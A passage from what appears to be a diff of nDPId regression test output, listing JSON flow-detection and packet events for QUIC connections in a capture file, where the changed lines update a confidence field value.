ZE+ZKc7Xlk9faNEXsEX+cAq53XDHpAkkbtjxhoLLEgwqg9w2+pJHK905szCqPYz1ey662LeHpygS8mmmH\/gOERXnPY24ktfjRbIPk+3jjlRJg9AEQHddCfLs\/0YynFjxEK6SkUDk3GOa0sGfGsU7zt7rbEh4JS4h\/\/R08A7nHPChHXr\/7ZgHR966vNTPtSXBteBzHwou8p5yVwauN1gN5GaWb31oFnrNAxiwuz4e2fwfa69YtXI4XWHFBvj4iNrdRBF9sHDZoob5bniwmHivCxgMW4+Jtbnaqfrv4Sp3dq00y6\/ur4ZEHV5m4FIMmbgmAyq9vvgmIFyJKBMGegGOoZYhISRV4ufDNEsgtjnm1Ha96l8R2gH9UD5FvAjfB\/ZwRBGmgFyc1RY+15Vl0HTZ4Rr+yCWwF2I4UFS+jzuwD+H6WEkNUgBjeLztMlKSo7QMs7PpOgFdZAlYejckZA1WodUw\/1bgj\/U6KGLbos4yPh+0rFNO0QtSRdW2TgBAAQucKeIvxgOUjTBEAP34nCw3lpKpedULlo5yFoLMltnNpkze\/b+9gBG8\/1mSO3ivzeDC3y6mANlLBm2iJns641SQdnTkf3L8X6YeBJsMYcaaiKYOyuuOiyeZy0YQZa4g5mFBz1gCqnQwBTBq6z8JWs1a\/iBlFkdzl55MjJD1jFCxVWdLyjInYMNmKxijI+ky9lNUsSaDzc5mgZpk3C0ZBbV058wqQx49fSF44m14OWseuaF+VY+qapJWKKL5t18OkWciu9MrAdQ4l66KAXEOIsGmkn8zlOyO4gaBESlpwfIO6YAp9wh9uTR9L+wkJgDcSe\/JWX30SUzbiRxqTmU9\/OJu2YJTPKi8wBs0qops1o6F9bQ4myo5lBZyqDquGfUWvrEXAbX82yldqPSTFnXWZt1UdImRyp1aGJVLjK7WjTb+ZSUcMVvxEHERZUt6VlUBe9SscDBCFdepioRLv56MnqrV+s4p\/g3CZ2sX0A9nX\/xgQxdccpjrif7tgBq+g7rjwIDWgS4NTZeETjOCtp53wYAhZZ32G\/hgRuBjIwqGUhTXHOoeOasvV+WD6Qh9WG\/ZAOn3eXObqDuYhD21bQbu7H9CTSFHgZo5\/P4wYz2WlEjbWMiQ9K7B5MQdxXUQYTDHm1OtDv1m9inaq9E9Mp1YP37ABzmfZ+XPVEzLA7x\/VqZvQgYfBYQAA=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1603816434542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434542,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAsZBAAEARzITAqAGAA3nyNu1wEVEE7LiZwwoKCgoI7mu7hqnhXwQAAETSneZc0FuQOOHT\/teiEyKQKqzHkPCOdcJLNU5VOm5QOz0aoCJBEfqd1iT7e6uyMoRT8wMX7assdH+rfwhkbtE0fDQ53avKQe54W1J5UEYikBP8CP81hlJVbphH435fnVTq7nYhJQx3T1Y6AQ2\/Im2so+HMSUWdbbnrP5LSk6E7PUTbsjJ7Z4IK2AyVHeK5bSLg80JZ1Sph0HZzQaEbqIMyi\/M6v3qgHFPF1JKKXsbwx36aShFPp5YRv\/soCC3iJDKx\/TOoopux88iYZkKX6xmVToWLTybIql7tHDaiQwlFHhBfrjhT6cVIuDMNZVXE8b8dgJrnGR4ypA9uhBp9z\/Snjb7kplkcAw9Yd0vXwuJxwvJbKYWpGBSBjpqgJK2NnsY91gg5TfSt3JN+70Jk3br16yCjz7tX60zGh5oP2DwLrrYetR3R0GFUOxDMh6G7aF3I80uIHLzKM5L7Cyq+eH+E4Oik6IopSkw7bwloBrghPMa9hxFBVEXX58oWV2xJT38EqSdgZFBF5dbInQYsnbTRjhDYyaiyt8vlg88mj5YsiwANcazCph4gIDWa4gyKspP8BKvUtXz02RGy3HX6Vo5Vamtwn+2PjOM+Q+DQVEQnn5msYlkn7ZY5ovQgEgbBX+huA6I5hUWWsPR3M2Kzn\/TPASjM5rwK0KxSpO5g\/gQQfc1S7J7YuDP8zIp427rx9HJYduWfVC4rgRUnB6I166YLVcOlExTMzRX5aOez8BEzIES9YduVGcZhm9AP3doiK0e16CBoljKKN4NSkTnRww5pIG7SP9IPdlyMMhv\/F65HJ9\/Qdzi\/8AR0RRXgbK4KSLJ1ZazP98Eo4okuRh2hJvsVfDsF82aUOJ+5IPV21tikqeD52JJgCcbnY1xvwCMuI9Ev5Q1BzfBglIWFmd3vD8LInWrtA2LQjCeOq98mFJn6QDvRQu5wKPIA\/ZgOKwVAUTiw4oj9THEfNPce2Rwgs9BQNDAwTNfNzVG4Uo8HZPdnnHL7R4K8hI28\/uWO7cqQHN0rdSoqUztCrLRvMc8S2B6IG\/FwTC+hPTm4cIQtFOJMoo2kOuyujyZ1LEIJszajyM3US0Z7vDZ\/NVv7NhCjNliBh1qCCQmrc2ZARdMzfQTwRZSk4Qp8dafvvYQ1LF9kATiR56vOstwif8mcEeSGpGjxHRxxaPCnx1FqTSBlji1+\/mVUMSnwTjTbZ8+IlF5bvzWmxCP6SmcY3uiWmUe8ABNCdQ6oFUGX7MujoMfHqznJ22xd4jRp9Th8CAdO6AtXd2qNEMNXvt+leql1vYAShneyVo44syrCJhZftvKw0lIESx6N8bEm9qmNGkSLU3jwsr4qMQ4GeNejADIeIEW8ilf6RTOWWH8Ge9WQmD0aziJpeLMRGeBecvHxLqJRfNb4UoC\/aiW\/ii+JMaepnbYUiRD4TObTS04rz7zN9ijDMemj465LaVNq0Le86L1W7PC8e6cQH0cTJum0Jqv\/LLqUQa9dj8VqTQbmKBPwwLy4YSngRqKOkKFIREtmChIase\/5QfE6hq1lhcHS9+TUiZhdPLF2dtk3KG4eRvLu8IjED0rc3A3SIXUgqoM1eHsOUNqbWaqmodcwXD4BHHuC3EdxDzolau+txc2+xwm+NH4ee2DBykjljA=="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1603816434548,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434548,"pkt":"PKn0qB\/spJGxgjQ5ht1gAW9\/ACMR7CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9AbuT9AAjezDGAAAAAAAIlGmXKMyAAG3\/AAAd\/wAAHP8AABs="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1603816434551,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1603816434551,"pkt":"PKn0qB\/spJGxgjQ5ht1gCVbMAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AbvrugAfxC\/CAAAAAAAI4QMvVRUj5m0KGio6\/wAAHQ=="} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1603816434566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434566,"pkt":"PKn0qB\/spJGxgjQ5ht1gC985ACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9Abu+QwArPVvlAAAAAAAIhDy+8x\/DNCJFR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1603816434569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434569,"pkt":"pJGxgjQ5PKn0qB\/sht1gCjENBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAABx\/ERUQTYsYfACgoKCggwbWAZ48sZPQAARL5w5HpjTfB6HE2JQjNEB1YmIe76YRB4wkvrzI8Py+EIKqBcyOOLSUBuzT912JXZ\/2dY3gtcHrCUweZkn\/T5Hj7RPGvPZqKFDdtBnWxfnsXvr8VhF5wnML7O4OsWP5nPvl6UO93+O4xio85bG8BLk14nxVMaEegFPQw41vQotLY1zGwG27cqyluUTVS52eHYVV4j83Dk9aui6JZsd4LVyJRUX2\/aUckCDuajGznu7FC2CzoKmlR9VSfkua99+L62GemAPTQ91VNnpbP5stk\/eROyYCQjK0Rz1x4lCPUHi2bIL+APn\/wkXXipr29g8XanJpO+FGEylpXWsJrrg0SI3jR39YuKgH\/KrVFhaTiB2Suy3PaKmi\/RzU8ypvxDJGoEdKNt7WXrvIvEzAROWanRVHPIqtyzoyATCv6emaC6YOFoMEpZbjomg2doT6BJk+EvC+YAEUaf8b3SEIGnXU8yeMJTcxsinB0KKzvXhxRAp7xoQkgseCm99W1kW+XHhN1QN\/TaCtfCfSVrUo2xGKhv3ymR2Vaw4omOsXp6J7Sjc0mbrS90K7ilwCM+Wfg0YoSkSDUSXY1AQnPTNjr2FMqanb49do1WhubRfE\/Ck0eHMZWPpGaO\/mph4jfOtDGM6OgXvUUlp5ROucFlBzCmVKkIyc2H8apiOM+07MDibQplJ4Az2+90761IvBgwfhlEPgdX1KDSHaJG4rPehCnx1Pp+yquyrKEzA5js4oFilyAy0vgDYNnz8kRaeeuCwuFEJgvXo8qRWj3noFvI+zM05NzQAJ+bmWMPgrG27iBYNGIvoGvmATqr8JgYwP4vU+hSyzxuJhQCf9Z1Yvi3GDN3YdoljnhaMO1Savux67rztE8c\/C8yDYwfMl4Hk9h2CnmhjXRv\/3esiIjaH9dPCD88ewNCiifrhvE9uNwL83wO4sr5zyTtZLeOfofME+dgPVQ7bgkbsRZetMQrrAt+izEoATXGeuXSCXJvZamlYZRQA9Y1hkw06gQpABA8+7BxNLKVRwU4R\/6Vyg6EQNzzD\/YA5VOGJvjRexKDRdxqrmlRTQq5hfIyAJHy\/HvrSIrmlbTwI7l2tlyS+TSdUxPcmU7n6Qs72zr3JKtijpeZTjiOvn5gH3Wz3LwmTGnGrpdVcS5m3nAy4dlf71QOIEEceuZ1zTiItSS1w+qpRUZsN7KqSmVbH5OnT58ueYRcxpx7o59KZHrxOOtppX89XTCUe1\/U6RKWIbGwK5B8t\/KtZN8LmG0kgcpcavl50oHuWDKuSGhWn78YjrWPPggvwb2mtAvV2xgf+KzFIUqCZ4tP72EyCyT8fsNUCySwHshLWySXBxdWfBkmiQPmX6KQcUxW7vUusJWyjH+HlW1ebLdsvC6JTIU9jvt6ymyaMyI\/rm50GWHDSBGar9xKv8vS9NCFORMVJp5Z83e9YH5EXVTDOpimXhA8N2hI9UWL\/X+c8xQkqXD5T0yYXpVHt7NhIvTwpfhjbEcUyf+BaoxMbBWX09ubEe4WSF3SBA7Dg+tiSOpxP11Hn04MactOeduGtV3YGVM9qWIdA3KpmTnOn7t96V09pndKxqCgN1gD4va9ZR8fB8j+u3uruPi0w2uDTcAmxYeEKNSLqA=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1603816434569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434569,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAabBAAEARba\/AqAGAg58YxobPAbsE7IX8wwoKCgoIJv2XczUh4RIAAETSRoJYBYOeas73v5N6JeGR+D4vrTXWLHahs6zbYN2PSmfpsY6grm3D0Rg\/JjEbEbWdaTF+lx2JzZ6OUYarkFy+115N6m1b7gQSj030Q3\/SM1TNZj\/nSEEyPzf0GDxqQj4+nZP7WMShjiYRdKzXBQdLzKvZT8hwnZ4oB99gppgeNELMhqdd1SySqMlsoa6maZtwfk3WBUm6ygdONT8WTBN7k1sBIrC8taS2In6WoqpYjWgCgSqLDUPElTi6Wlu3qxPK0L89RJAyo7d95jjEyHvPN8tIah5cWcQDYEYe4huV1Wk4ReHtQlciAzAXks6By4Kk0EH6V\/vjIC8b6b+cCLYGgbSpy+UnT\/8ZA\/UQuk7xfmOopsc1Y98fvndGTrq5RKwehvcBoo5Mn7MwglvspnL5JNC3Wm1g6bxDaeVst7hRZBFiDlhiYaQ0Ab6hTr1EJaOuADWqvlem+VI3ScFJxVtLzW45MMzPqLsgDN0nwzvC5MgRoNBFenkwFuOGJL3cuoRXUyC3LM81pQYUYluofbI7QpbP2iRSlWRlGLd+f8zLs+KcyeL5yNSmFslj7bzWf\/JF6mVv58XYK55HQs40V9rrlz7Nj\/WpjPtqqYZhJzg0gyU\/lbPd8kQLgVED59ItVwC3fIrmrMfcRnaanuGrvWgwIdywVEgwonSypaCKhJxenk3liQiSK4PIyLjElDxx0+CyQwtFMw0J6Rd2Mh0rRN9Qg6bbB+l+1HBn2AZjjpQRkF3k+wmrwQ3tlFWbURiRza9xq8onWimWZ4E80sO2DhLrdh5rcVJQeQt4rdLXRJq+nwgrsVxBbz2\/q8\/SLYx1O2bZBHh\/9BOOD1ryspmCVDPmvYwFGBraeD2+NW89wNvReyoP3HK0rCJ\/kri1cIGHbCcj++dh0yrqPt7Tf\/h83mJX2ClPu+4JxyyaiUh6X8GxTD5uMA+60fYmu+ll1hlhETX4lTtQ\/kXioQnJXjK9uS5\/mUX\/uGF7bLIle1fQUQwXMiKDhED8bldaUYDhxS5xaoXVFHYCkZD1G0bx4wNv8Yb\/Z6CBWe+ohQSURy647CyvtGSWeEchDWk746VaGkX3lxlsbKJKHBhqx7ONQcIFzj1Uy1jMc0AJU7zrl2kD8zQXmaNY4cUoA+GXy043sC2xwegQudxFTao\/gdfkQ\/q1NCe\/ml37Rl6EO3X3l9xGK4gSgGFs8v4x6Cb5DrR4JVJ5cHHSfWZa9UBPO1JdiEg8\/VX\/TMt1fQN+ReU4W02BaESJr6JTbZ2z47SHhCBYG6zwySaG7Lw65ubXXruEdd1pYjzU7fMm7oTz8Lh\/jPP1IP0yMSfVCRBlQiy9xU4NDYENzi1wl4tIvdERDQbkkbp0nWFv+lt+bkws2Q1vZy+gP3OrU8l5zDk0wZvYK1K+G1iWmyU8uDxuww\/HPy3G9m9DbYJTtzjTkrnXSnww3izdOvRZeolPfe0Z6lcnGUQ1\/j4+H4gBCwQLWrpcyqpCaXzS0ah6Mc6s8FdIMqnxX4rU8rBpXWoJ14XtBm3Uyy1wVEeRuIc4t8D3Za5OjHN5cGk13mZGhzHFhggCcpbM8VxO4s5FnO5gkpIVe3rp914hsLEJPh7ThKO5jLy2z2hTqHf5sMr6xpDc+5DzcXLzyMz+du5WiB2vEQ=="} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1603816434582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434582,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAoSJAAEARNaLAqAGAM55pYsqvAbsE7MzswgoKCgoIEaz1Ap+9VxAAAETSW+W4muYv+Ex5TDdhGEEgn\/uAu0qlojP\/J9hIDPqzwz+JlTXFPtSI+aiI+wxPcULAye6UrinGUUzBJN9cIkelzrXiONFE9BjSvgDnaRECpumembikZ2HAk2TZWGNiHThAH4BNmcORyySVZrHBrWfpgdT2X+HBd1V9EwlFlpGOWc1WMXNhMkNYXVupHdH7xVbTBo5OLCElubCjSPLQcYjGtGeLSII96GmgvBOPIrvVPJlrK82HF20a9nNNukdp4BPXnL8I2t+rb0dK\/ghu8TRSa3A+cCR\/8rWbZqaii1OpbuZnQ1EcUrceIDrLKjGsVgpT38KpctLTQ\/LEEVi9cgfwkd28yGJ\/sRbZDa9nN\/DCQk\/CQdVd36eB9jrAYsgu00NdXaK8a13Lde68fZxyZAQpIVnvcfH2Id0GXqqN8JhGEanp74gRCpI27i8iPAmsd3UMjsAW4\/kdVXe3S7CJE2WY0tiD\/+JDxJcFk5llcTgkntKqmYbhPxvEadncEKOIQWKyGQzjDvwSwmig63\/L5G76ukNd5cXQMQN9y+ZTvw7kwrdSXrlmPNlCnkDTwHvC5AJ3k2x4xqqQ\/iNrJ0ZPKJa+ZbSaagf+oOqskwf4MMNjZMwfufWkri43N+eDbtXKbCXPhtUVj407PdHTmzDQCEhc\/2YUIpKa27K6uS7hywCslRzTmpBr7JTDvB08\/wQc36h91hA\/Pk+QFTxQ3jSb17rPzZignHJ8+ktxWDlqgmNhirOBTFHrKKKxFfj7Zd\/VdS2hwqNZRHNiT\/rt9McdxnGuTtU3Je9EyeeJmZRmMe\/caGlDh5g04pl8F7+Oo1btWtTbgaTib8s1bb7OqyePGSaVywbgEE2DT8hSkw\/0V9rX3HxqWWKlm3Q6KLMIO4x9UT+hK9EjaTbVO3sb7ntSBtUvWM69geB7FjBtVEq\/e9xSbiiqRGEZN8fX\/2BZdK\/e7OiNqVv+75BROBKhr8CroCTuIcvBAJsteqOP53Z29BgiPdg5qdLysu2zuT3+eDoL1SSxZ3XRR5bynYqVXOHT9L+i9E\/4kNKasvWdlomwsUZBUHLlgPk6bGw4Ne65krgmZRjBxl36YGLw6+sfkjJoh7npwlPGVTMi0to4OLfQHhGF0beq1Uwve8Fq1vubD4YPVoyRUfwB7pZiGZlefHURnSMLZuwlS26beylIwMqP26dsDx7\/clmOwL44sg6\/0wzyXIp